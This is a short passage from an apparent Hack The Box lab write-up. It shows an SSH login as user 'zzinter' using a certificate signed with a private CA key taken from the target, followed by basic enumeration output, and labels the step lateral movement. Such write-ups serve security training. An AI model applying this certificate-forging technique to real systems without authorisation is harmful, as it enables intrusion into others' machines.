zzinter
Using the signed public key with the private CA key to authenticate to the target SSH server
┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ ssh zzinter@$IP -o CertificateFile=zzinter-itrc-cert.pub -i ca-itrc
Linux itrc 5.15.0-117-generic #127-Ubuntu SMP Fri Jul 5 20:13:28 UTC 2024 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 4 19:57:06 2024 from 10.10.16.67
zzinter@itrc:~$ whoami
zzinter
zzinter@itrc:~$ hostname
itrc
zzinter@itrc:~$ /usr/sbin/ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.223.0.3 netmask 255.255.0.0 broadcast 172.223.255.255
ether 02:42:ac:df:00:03 txqueuelen 0 (Ethernet)
RX packets 21800143 bytes 2050460599 (1.9 GiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 17873457 bytes 3121101797 (2.9 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 345995 bytes 21459291 (20.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 345995 bytes 21459291 (20.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Lateral Movement made to the zzinter user via SSH